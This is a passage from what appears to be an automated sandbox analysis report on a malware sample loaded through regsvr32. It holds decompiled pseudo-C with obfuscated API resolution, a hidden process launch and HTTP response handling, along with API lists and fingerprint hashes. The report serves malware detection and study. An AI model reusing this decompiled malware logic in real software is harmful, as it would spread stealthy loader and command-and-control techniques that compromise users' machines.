					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2bdd2a8; // 0x242a5a8
					_t18 = _t47 + 0x2bde3e6; // 0x73797325
					_t68 = E02BD7912(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2bdd2a8; // 0x242a5a8
						_t19 = _t50 + 0x2bde747; // 0x5008cef
						_t20 = _t50 + 0x2bde0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02BD3179();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02BD3179();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2bdd238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02BD8B22(_t70);
				goto L12;
			}


















                                0x02bd348d
                                0x02bd348d
                                0x02bd349c
                                0x02bd34a3
                                0x02bd34a8
                                0x02bd35b5
                                0x02bd35bc
                                0x02bd35bc
                                0x02bd34b7
                                0x02bd34bf
                                0x02bd34c2
                                0x02bd34c7
                                0x02bd34dc
                                0x02bd34e2
                                0x02bd34e3
                                0x02bd34e6
                                0x02bd34ec
                                0x02bd34ef
                                0x02bd34f4
                                0x02bd34fc
                                0x02bd3508
                                0x02bd350c
                                0x02bd359c
                                0x02bd3512
                                0x02bd3512
                                0x02bd3517
                                0x02bd351e
                                0x02bd3532
                                0x02bd3536
                                0x02bd3585
                                0x02bd3538
                                0x02bd3539
                                0x02bd3540
                                0x02bd3559
                                0x02bd355b
                                0x02bd355f
                                0x02bd3566
                                0x02bd3580
                                0x02bd3568
                                0x02bd3571
                                0x02bd3576
                                0x02bd3576
                                0x02bd3566
                                0x02bd3594
                                0x02bd3594
                                0x02bd350c
                                0x02bd35a3
                                0x02bd35ac
                                0x02bd35b0
                                0x00000000

                                APIs
                                  • Part of subcall function 02BD4944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BD34A1,?,00000001,?,?,00000000,00000000), ref: 02BD4969
                                  • Part of subcall function 02BD4944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BD498B
                                  • Part of subcall function 02BD4944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BD49A1
                                  • Part of subcall function 02BD4944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BD49B7
                                  • Part of subcall function 02BD4944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BD49CD
                                  • Part of subcall function 02BD4944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BD49E3
                                • memset.NTDLL ref: 02BD34EF
                                  • Part of subcall function 02BD7912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02BD3508,73797325), ref: 02BD7923
                                  • Part of subcall function 02BD7912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02BD793D
                                • GetModuleHandleA.KERNEL32(4E52454B,05008CEF,73797325), ref: 02BD3525
                                • GetProcAddress.KERNEL32(00000000), ref: 02BD352C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BD3594
                                  • Part of subcall function 02BD3179: GetProcAddress.KERNEL32(36776F57,02BD8BDC), ref: 02BD3194
                                • CloseHandle.KERNEL32(00000000,00000001), ref: 02BD3571
                                • CloseHandle.KERNEL32(?), ref: 02BD3576
                                • GetLastError.KERNEL32(00000001), ref: 02BD357A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                • String ID: Ut
                                • API String ID: 3075724336-8415677
                                • Opcode ID: 4c97ba8e2d3a1431167ff2553ce9e6726c347044b37f8af83766f1f6f42797b1
                                • Instruction ID: afbd4f31a881cee55d25169294fd6d1d25522d42d47e485590ce6c7359f1c90c
                                • Opcode Fuzzy Hash: 4c97ba8e2d3a1431167ff2553ce9e6726c347044b37f8af83766f1f6f42797b1
                                • Instruction Fuzzy Hash: 503133B2C00209AFDB10AFA4D888EDEBBFDEB04348F0149A5E645E7111E7359A54CF51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD8F85, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E02BD8F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x2bdd33c; // 0x5009bc0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E02BD9B1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x2bdc18c;
				}
				_t46 = E02BD7F8B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E02BD1525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x2bdd2a8; // 0x242a5a8
						_t16 = _t75 + 0x2bdeb08; // 0x530025
						 *0x2bdd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E02BD9B1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x2bdc190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E02BD1525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E02BD8B22(_v20);
						} else {
							_t66 =  *0x2bdd2a8; // 0x242a5a8
							_t31 = _t66 + 0x2bdec28; // 0x73006d
							 *0x2bdd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E02BD8B22(_v12);
				}
				return _v24;
			}




























                                0x02bd8f8d
                                0x02bd8f93
                                0x02bd8f9a
                                0x02bd8fa0
                                0x02bd8fa4
                                0x02bd8fa8
                                0x02bd8fab
                                0x02bd8fb0
                                0x02bd8fb5
                                0x02bd8fb7
                                0x02bd8fb7
                                0x02bd8fc0
                                0x02bd8fc5
                                0x02bd8fca
                                0x02bd8fd0
                                0x02bd8fda
                                0x02bd8fe3
                                0x02bd8fea
                                0x02bd9003
                                0x02bd9008
                                0x02bd900d
                                0x02bd9016
                                0x02bd901f
                                0x02bd9030
                                0x02bd9039
                                0x02bd903d
                                0x02bd9041
                                0x02bd9046
                                0x02bd904b
                                0x02bd904d
                                0x02bd904d
                                0x02bd9057
                                0x02bd9060
                                0x02bd9067
                                0x02bd907f
                                0x02bd9083
                                0x02bd90c0
                                0x02bd9085
                                0x02bd9088
                                0x02bd9090
                                0x02bd90a1
                                0x02bd90ad
                                0x02bd90b5
                                0x02bd90b9
                                0x02bd90b9
                                0x02bd9083
                                0x02bd90c8
                                0x02bd90cd
                                0x02bd90d4

                                APIs
                                • GetTickCount.KERNEL32 ref: 02BD8F9A
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 02BD8FDA
                                • lstrlen.KERNEL32(00000000), ref: 02BD8FE3
                                • lstrlen.KERNEL32(00000000), ref: 02BD8FEA
                                • lstrlenW.KERNEL32(80000002), ref: 02BD8FF7
                                • lstrlen.KERNEL32(?,00000004), ref: 02BD9057
                                • lstrlen.KERNEL32(?), ref: 02BD9060
                                • lstrlen.KERNEL32(?), ref: 02BD9067
                                • lstrlenW.KERNEL32(?), ref: 02BD906E
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: 0782615c1b639f62c504b5624ef4a52f44568eccd2e6041969810b1bd57ce331
                                • Instruction ID: 252fa5d692d5a5e440b15fe1de650327c59d86a555f50d84f889c09b0222cb5b
                                • Opcode Fuzzy Hash: 0782615c1b639f62c504b5624ef4a52f44568eccd2e6041969810b1bd57ce331
                                • Instruction Fuzzy Hash: 70416B76D00619FBCF11AFA4DC48ADEBBB5EF44358F014491E904A7210EB36DA61DF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD57DD, Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD57DD(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02BD1525(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E02BD8B22(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02BD29C0( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                                0x02bd57dd
                                0x02bd57dd
                                0x02bd57ed
                                0x02bd57f0
                                0x02bd57f4
                                0x02bd57fa
                                0x02bd57ff
                                0x02bd5818
                                0x02bd582c
                                0x02bd5833
                                0x02bd583a
                                0x02bd588d
                                0x02bd5893
                                0x02bd5899
                                0x02bd58d4
                                0x02bd58da
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd5899
                                0x02bd5840
                                0x00000000
                                0x02bd5847
                                0x02bd5855
                                0x02bd5858
                                0x02bd585b
                                0x02bd5867
                                0x02bd586b
                                0x02bd58cd
                                0x02bd586d
                                0x02bd587f
                                0x02bd58bd
                                0x02bd58c8
                                0x02bd5881
                                0x02bd5884
                                0x02bd5888
                                0x02bd5888
                                0x02bd587f
                                0x00000000
                                0x02bd586b
                                0x02bd5840
                                0x02bd5804
                                0x02bd580a
                                0x02bd580d
                                0x02bd5812
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd58a2
                                0x02bd58aa
                                0x02bd58af
                                0x02bd58b2
                                0x00000000

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 02BD57F4
                                • SetEvent.KERNEL32(?), ref: 02BD5804
                                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02BD5836
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD585B
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD587B
                                • GetLastError.KERNEL32 ref: 02BD588D
                                  • Part of subcall function 02BD29C0: WaitForMultipleObjects.KERNEL32(00000002,02BDA923,00000000,02BDA923,?,?,?,02BDA923,0000EA60), ref: 02BD29DB
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                • GetLastError.KERNEL32(00000000), ref: 02BD58C2
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 3369646462-0
                                • Opcode ID: ee3870b638c3e37794792263448e00298343fd96bcccfada83f5702489b0b197
                                • Instruction ID: 06d961af154f9d59bc2f9b9e2e9bd31cfbb86a9f52fad85a86c28c3b441cdc6b
                                • Opcode Fuzzy Hash: ee3870b638c3e37794792263448e00298343fd96bcccfada83f5702489b0b197
                                • Instruction Fuzzy Hash: 84312EB5D40309EFDB30DFA5C8849DEBBF8EB08344F5049AAE542E6251E771AA44DF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD7B8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 63%
                                			E02BD7B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2bdd2a8; // 0x242a5a8
				_t1 = _t9 + 0x2bde62c; // 0x253d7325
				_t36 = 0;
				_t28 = E02BDA055(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E02BD1525(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E02BD1188(_t34, _t41, _a8);
						E02BD8B22(_t41);
						_t42 = E02BD976F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02BD8B22(_t36);
							_t36 = _t42;
						}
						_t43 = E02BDA41C(_t36, _t33);
						if(_t43 != 0) {
							E02BD8B22(_t36);
							_t36 = _t43;
						}
					}
					E02BD8B22(_t28);
				}
				return _t36;
			}














                                0x02bd7b8d
                                0x02bd7b90
                                0x02bd7b91
                                0x02bd7b99
                                0x02bd7ba0
                                0x02bd7ba7
                                0x02bd7bab
                                0x02bd7bb1
                                0x02bd7bb8
                                0x02bd7bbd
                                0x02bd7bcf
                                0x02bd7bd3
                                0x02bd7bd7
                                0x02bd7bdd
                                0x02bd7be2
                                0x02bd7bf2
                                0x02bd7bf4
                                0x02bd7c0b
                                0x02bd7c0f
                                0x02bd7c12
                                0x02bd7c17
                                0x02bd7c17
                                0x02bd7c20
                                0x02bd7c24
                                0x02bd7c27
                                0x02bd7c2c
                                0x02bd7c2c
                                0x02bd7c24
                                0x02bd7c2f
                                0x02bd7c2f
                                0x02bd7c3a

                                APIs
                                  • Part of subcall function 02BDA055: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,02BD7BA7,253D7325,00000000,00000000,7691C740,?,?,02BD9DA0,?), ref: 02BDA0BC
                                  • Part of subcall function 02BDA055: sprintf.NTDLL ref: 02BDA0DD
                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,02BD9DA0,?,050095B0), ref: 02BD7BB8
                                • lstrlen.KERNEL32(?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BC0
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • strcpy.NTDLL ref: 02BD7BD7
                                • lstrcat.KERNEL32(00000000,?), ref: 02BD7BE2
                                  • Part of subcall function 02BD1188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02BD7BF1,00000000,?,?,?,02BD9DA0,?,050095B0), ref: 02BD119F
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BFF
                                  • Part of subcall function 02BD976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02BD7C0B,00000000,?,?,02BD9DA0,?,050095B0), ref: 02BD9779
                                  • Part of subcall function 02BD976F: _snprintf.NTDLL ref: 02BD97D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 91b21593c5eaf42809b58894cdd106206296e5f051d33fd925f3a0faf3d371e4
                                • Instruction ID: 4706b7bae7a735091ce789224bbeac91be5fd4db4896e57d973e8e626945e8bd
                                • Opcode Fuzzy Hash: 91b21593c5eaf42809b58894cdd106206296e5f051d33fd925f3a0faf3d371e4
                                • Instruction Fuzzy Hash: 4011A3779015257B47127BB89C44CEEBAAEDF487543090595F904EB100FF35D9029BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD944A, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 02BD94A4
                                • SysAllocString.OLEAUT32(0070006F), ref: 02BD94B8
                                • SysAllocString.OLEAUT32(00000000), ref: 02BD94CA
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD9532
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD9541
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD954C
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 40e8d7cc1f6a1efb3639734d834195d99be372c2a8c9fb6b84bab36595523337
                                • Instruction ID: 72287c7eb78b3c03414ce60ed45ea760902bf2af766af7bc5550e7b321a75340
                                • Opcode Fuzzy Hash: 40e8d7cc1f6a1efb3639734d834195d99be372c2a8c9fb6b84bab36595523337
                                • Instruction Fuzzy Hash: 24415F36D00A09AFDB01DFF8D844AEEB7BAEF49304F144466E914EB211EB71DA05CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD4944, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD4944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02BD1525(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2bdd2a8; // 0x242a5a8
					_t1 = _t23 + 0x2bde11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2bdd2a8; // 0x242a5a8
					_t2 = _t26 + 0x2bde769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02BD8B22(_t54);
					} else {
						_t30 =  *0x2bdd2a8; // 0x242a5a8
						_t5 = _t30 + 0x2bde756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2bdd2a8; // 0x242a5a8
							_t7 = _t33 + 0x2bde40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2bdd2a8; // 0x242a5a8
								_t9 = _t36 + 0x2bde4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2bdd2a8; // 0x242a5a8
									_t11 = _t39 + 0x2bde779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02BD5CD1(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                0x02bd4953
                                0x02bd4957
                                0x02bd4a19
                                0x02bd495d
                                0x02bd495d
                                0x02bd4962
                                0x02bd4975
                                0x02bd4977
                                0x02bd497c
                                0x02bd4984
                                0x02bd498b
                                0x02bd498d
                                0x02bd4992
                                0x02bd4a11
                                0x02bd4a12
                                0x02bd4994
                                0x02bd4994
                                0x02bd4999
                                0x02bd49a1
                                0x02bd49a3
                                0x02bd49a8
                                0x00000000
                                0x02bd49aa
                                0x02bd49aa
                                0x02bd49af
                                0x02bd49b7
                                0x02bd49b9
                                0x02bd49be
                                0x00000000
                                0x02bd49c0
                                0x02bd49c0
                                0x02bd49c5
                                0x02bd49cd
                                0x02bd49cf
                                0x02bd49d4
                                0x00000000
                                0x02bd49d6
                                0x02bd49d6
                                0x02bd49db
                                0x02bd49e3
                                0x02bd49e5
                                0x02bd49ea
                                0x00000000
                                0x02bd49ec
                                0x02bd49f2
                                0x02bd49f7
                                0x02bd49fe
                                0x02bd4a03
                                0x02bd4a08
                                0x00000000
                                0x02bd4a0a
                                0x02bd4a0d
                                0x02bd4a0d
                                0x02bd4a08
                                0x02bd49ea
                                0x02bd49d4
                                0x02bd49be
                                0x02bd49a8
                                0x02bd4992
                                0x02bd4a27

                                APIs
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BD34A1,?,00000001,?,?,00000000,00000000), ref: 02BD4969
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BD498B
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BD49A1
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BD49B7
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BD49CD
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BD49E3
                                  • Part of subcall function 02BD5CD1: memset.NTDLL ref: 02BD5D50
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 3c530e5eb2519b141382a7239d55d9cce332c14f002ebf222fa46ff3f210e2f7
                                • Instruction ID: a4f8f88c40c5b722a13372c5ac160637887957dab88153d1daa7a9564747ab2c
                                • Opcode Fuzzy Hash: 3c530e5eb2519b141382a7239d55d9cce332c14f002ebf222fa46ff3f210e2f7
                                • Instruction Fuzzy Hash: 33217AB164160AAFD710EF69DC84EDAB7FCEF083447020466E955DB220FB30EA04CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD4B2A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E02BD4B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x2bdd33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E02BD7B3B( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E02BD8C52(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E02BD8B22(_a8);
						goto L29;
					}
					_t64 =  *0x2bdd278; // 0x5009d18
					_t16 = _t64 + 0xc; // 0x5009e3a
					_t65 = E02BD7B3B(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d02bdc0
						if(E02BDA38F(_t97,  *_t33, _t91, _a8,  *0x2bdd334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x2bdd2a8; // 0x242a5a8
							if(_t98 == 0) {
